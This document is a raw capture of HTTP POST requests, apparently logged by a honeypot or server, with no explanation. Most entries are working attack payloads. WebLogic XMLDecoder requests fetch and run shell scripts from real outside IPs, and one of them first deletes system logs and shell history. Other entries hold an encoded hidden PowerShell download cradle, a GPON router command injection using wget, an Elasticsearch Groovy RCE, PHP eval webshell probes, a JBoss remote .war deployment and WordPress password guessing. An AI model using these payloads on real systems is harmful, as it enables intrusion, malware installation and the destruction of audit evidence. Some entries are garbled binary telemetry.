S/Fcl9LKYA8DrdXmMonzIIz+2rxcpsS4LeIlWhtMsbG55xyC+UdTXqzJ7t8Mwg0IVCCezJzo3RnSpZwlyJkMiBtZ5uSH9kiYrWJL10yRUZgdeBOY56KfIteQbzC5BYw8ivTf6yCs8QM1XUE1T0xxUI4pPsb35USYfCvd2M3uLBj7gPhGiX5YSywDHhj2ulxzbpnMl0wba8bjuAox2CtjLq7vdsqPEhfpTRH+LjKrex1Xc6B+QxlJAxye5mgSCWrpX3wL29hEdRmLw783WzCsUwvN3XAIP0h+x3O4slB/Sl+17KLhNSsGiHTUXf4w3rKTSNh83kOrr41XBxiKWlnHlhTqrivt1enovBgPW5LaDmzoodSwGdJsuZL6XOhnTxHmWdw1KfpTtvu6xuYcfFSkrPJMWQ==

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /db_session.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

eval=die('Hello, Peppa!'.(string)(111111111*9));

POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 19
Cache-Control: no-cache

log=172&pwd=1722014

POST /db.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32

eval=die((string)(111111111*9));

POST http://check.proxyradar.com/azenv.php?auth=149408915993&a=PSCMN&i=1082769359&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
pÈ!3Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îHY›∆√«∆fl

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å

⁄SÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îìFY›∆√«∆fl

post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive

{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
%ÑlhÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î¯+Y›∆√«∆fl

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
¸√ßÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îr\0Y›∆√«∆fl

POST http://f3.mi-stat.gslb.mi-idc.com/diagnoses/v1/report HTTP/1.1
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: f3.mi-stat.gslb.mi-idc.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Content-Length: 516

n=98134312514971&d=HCgAGAAYABgAABgHaHR0cGFwaRwYB2h0dHBhcGkYATAYFjQuNC40LVY3LjAuNS4wLktYRE1JQ0kYDG1vYmlsZS1IU1BBKxgPMTE0LjEyNC4yMDcuMjUyHBgG5Zu95aSWGAbljbDlsLwYABgAABocGBNhcHAuY2hhdC54aWFvbWkubmV0GTwYE2FwcC5jaGF0LnhpYW9taS5uZXQVABUCFvzJARUAGwAAGA01NC4yNTUuMTg0LjE2FQIVABYAFQAbAYUWU29ja2V0VGltZW91dEV4Y2VwdGlvbgIAGA40My4yMjQuMjQ3LjE2OBUCFQAWABUAGwGFFlNvY2tldFRpbWVvdXRFeGNlcHRpb24CAAAYD2NvbS54aWFvbWkueG1zZhgPY29tLnhpYW9taS54bXNmGBY0LjQuNC1WNy4wLjUuMC5LWERNSUNJAAA%3D&t=1494506028345&s=FDA6AF2A7BD99ECB9F41618756C237C1

POST /xx.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25



POST http://check.proxyradar.com/azenv.php?auth=149415140129&a=PSCMN&i=1082784101&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1673
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
   <soapenv:Header>        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
           <java version="1.8.0_151" class="java.beans.XMLDecoder"> 
               <void class="java.lang.ProcessBuilder"> 
                  <array class="java.lang.String" length="3">                      <void index = "0">                                                 <string>cmd</string>                                       </void>                                                          <void index = "1">                                                 <string>/c</string>                                        </void>                                                          <void index = "2">                       <string>unset; rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog; touch /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog; unset HISTFILE; unset HISTSAVE; unset HISTLOG; history -n; unset WATCH; export HISTFILE=/dev/null; export HISTFILE=/dev/null; wget http://93.174.93.149/logo8.sh -O /tmp/logo8.sh; curl -o /tmp/logo8.sh http://93.174.93.149/logo8.sh; lwp-download http://93.174.93.149/logo8.sh /tmp/logo8.sh; bash /tmp/logo8.sh; rm -rf /tmp/logo8.sh; history -c</string>                      </void>                                                      </array>                  <void method="start"/>                  </void>            </java>        </work:WorkContext>   </soapenv:Header>   <soapenv:Body/></soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
      <string>cmd.exe</string>
    </void>
    <void index="1">
      <string>/c</string>
    </void>
    <void index="2">
      <string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
    </void>
  </array>
    <void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>


POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
™≈˜[Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î´5Y›∆√«∆fl

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
«™›^Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îVJY›∆√«∆fl

POST /login.action HTTP/1.1
User-Agent: Mozilla/5.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: x.x.x.x
Content-Length: 395
Expect: 100-continue
Connection: Keep-Alive



POST /xx.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 47

axa=die('Hello, Peppa!'.(string)(111111111*9));

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 21
Cache-Control: no-cache

log=admin&pwd=!@#$%^&

POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118

XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0



POST /wuwu11.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 23



POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
∂0B÷Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞î?1Y›∆√«∆fl

POST /web-console/Invoker HTTP/1.1
Host: x.x.x.x:8080
Accept-Encoding: identity
Content-Length: 574
Connection: keep-alive
Content-Type: application/x-java-serialized-object; class=org.jboss.console.remote.RemoteMBeanInvocation
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0

¨Ìsr.org.jboss.console.remote.RemoteMBeanInvocation‡O£ztÆç˙L
actionNametLjava/lang/String;[paramst[Ljava/lang/Object;[	signaturet[Ljava/lang/String;LtargetObjectNametLjavax/management/ObjectName;xptdeployur[Ljava.lang.Object;êŒXüs)lxp
srjava.net.URLñ%76¸‰rIhashCodeIportL	authorityq~
Lfileq~
Lhostq~
Lprotocolq~
Lrefq~
xpˇˇˇˇˇˇˇˇtjoaomatosf.comt/rnp/jexws3.warq~thttppxur[Ljava.lang.String;≠“VÁÈ{Gxp
tjava.net.URLsrjavax.management.ObjectNameßÎmœxpt!jboss.system:service=MainDeployerx

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /_search?pretty HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
User-Agent: Java/1.8.0_31
Content-Length: 409
Host: x.x.x.x:9200

{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 424
Cache-Control: no-cache

EK0NldLKYsr+W5poEXPtZmniPo64WxzpovppRI3AjlACNprkmVfNzMiR2kfdQFdfAIPHMc20CiHHHlldIEug1evvG6S4RogtClqB0FCLka6ZVKLBgY4coWHH/eVor7Cs4Dj8anEPohpjyvCpocuoiaIaWIBPI3nmHH+Vw6KNInf1CPzO0+hZBd0Yrq2vW3DryVmWMlsvBvNkahVaFASANY23e8IPO4cgMjn+np6xiqKfYOlZfCWglL01D4Z1Y4aiCES9tMfEDIxnfLRm2CpNSlenJANJb03tMCbnfovI/vSDhGUtaSVl2TAvbJTHbPy7BDMPQGwCjDx14MUpaHgXAchAnpgK83Z7VTswrySX4Azkt8YgSsAIaCWEoNduIEXLB4IHehFUCIruXeFqySsghQxZUYQZI/35ltwDi5b+

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 23
Cache-Control: no-cache

log=admin&pwd=123456789

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 444
Cache-Control: no-cache

QqZdxd2eNgHzsIJfTdCvn9BtrEc3QgEDL+RhMgC+zcb+3BqTeaccXPoTwyRa/3a1WyU6LOQYDNBhGdP+fzkfWcSpHuuTkJ9XYF+aqTdoJi9DS88NzZ0FDRPQIsU7ktuLY6TOJp7WEcGvQ8b15+w9l7QWHX4e5/fCc2y5lOdJy9upm3eLnLfVBBSKYAGMT87TU/ZkAauqknhTmSUtvQQHqMCn0EKobd+V9P+jjyvK9leZ8kI3DPmQU3CU4j2DpFIapIPr3izEM6sBiOVpSao1mAb4b6WafmUA1ajs6evEK+p4MpVeE22IX15rKDW+AVay9ifl/XAPDwP8QjNliFymnMHg1NXXEZ39WbrPqK8VuOTFc3ZY2XV9oEbwUjDNo3p3j3dVjanKMh6wAl3QPQD9YhxCkEEztW2xZIBUtpPE36Ux8D1Bo/CGTEG4sw==

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
˙PbÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îÏY›∆√«∆fl

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive

{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 380
Cache-Control: no-cache

QKRYlIueMehnEkb1wy2D6UuVtZ302tLzox9wVSTBsGSVQUzP8VWbNBH1jjls/7i+uwuLZwckTXYe2B6NoDiJKp8kUakD1cMSZtgvVO7GXBwEdex8vOyjH92l9AfaiwQIgfT2ZkvMHN8GcM4dsFnzGIXoSfDtxv4MfPnu6doi+oGUib9G0Gb/fEv/cHkTuXNTCVidx6AjxUFgxB1trB5EmsCJ0ducwrTXPUlUlFu8ZDYvOZFas/gDWuasWCqHOLk00JPh6kMzT1vn+usPsXFEoPy5RjGRsISR8FbMHy+vJzvwMAdkqPPpI3lGeNp3WxL7qbz83BDe1PTlCeGyuMj97r+9MsAj//4DY9kSGjNpfi6DAk9hGvaN7d6EAB0=

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; MASBJS; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 376
Cache-Control: no-cache

VV6ynXJEWTw+wTKmbSJ7D/EIgZBmKZZ5yu8Los7SedAlt0APNORChaUgMGOWQyA/oqDq/10h4mCp7CipwJdiUcDOjbbpirI3LnYK8D8DeLf/Rd3zyLpdbFjj3M+Tlmg9+ENK4P3ErI0XaEVEdYwzCzqe2M0v5NvVdGUjLz8mX/EBhKqfZCXjdAZ+KSOZWO9fqzG38ZWogMmmGKI8LsyNgslrgkpj0NQ/6QixOsrRdQF3jW8loPT4VhtwLoYyCsV7yPoBP1/5MuM4kwDSQZKn29unbyrr3m10NmJ6x4ckvQ545bNKTSkE3ehOlUR5ghWZoX0ZmtfKZUk8HsskqDCX1gUB+BiCQ12TrbK3LDug3ZlkUm2UHj5wgA4=

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 21
Cache-Control: no-cache

log=admin&pwd=admin22

POST /j_security_check; HTTP/1.1
Host: x.x.x.x:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Cookie: 
Content-Type: application/x-www-form-urlencoded
Content-Length: 66

j_username=administrator&j_password=administrator&logonDomainName=

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://alog.umengcloud.com/app_logs HTTP/1.1
X-Umeng-UTC: 1496473335624
X-Umeng-Sdk: Android/6.0.9 PopCat%2F2.1.2+MI+4LTE%2F4.4.4+D2EA899797B039FCD23DDA127C0FE621
Msg-Type: envelope/json
Content-Type: envelope/json
